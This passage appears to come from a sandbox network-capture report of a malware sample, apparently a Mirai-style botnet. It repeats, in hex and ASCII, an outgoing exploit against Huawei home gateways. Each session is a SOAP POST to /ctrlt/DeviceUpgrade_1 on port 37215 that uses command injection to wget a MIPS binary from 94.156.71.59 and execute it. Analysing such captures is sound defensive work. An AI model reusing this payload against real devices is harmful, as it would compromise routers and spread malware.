                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1088192.168.2.1335384197.48.91.9837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.699145079 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1089192.168.2.133732241.188.151.24237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.703074932 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1090192.168.2.135676041.86.44.9337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.706065893 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1091192.168.2.1358816156.181.148.25037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.709479094 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1092192.168.2.1354400156.7.203.7137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.712565899 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1093192.168.2.1339842156.146.227.12337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.717323065 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1094192.168.2.133536841.13.10.16537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.722310066 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1095192.168.2.133408041.188.45.14537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.725781918 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1096192.168.2.133323241.49.9.037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.729372025 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1097192.168.2.133720841.142.2.15637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.732848883 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
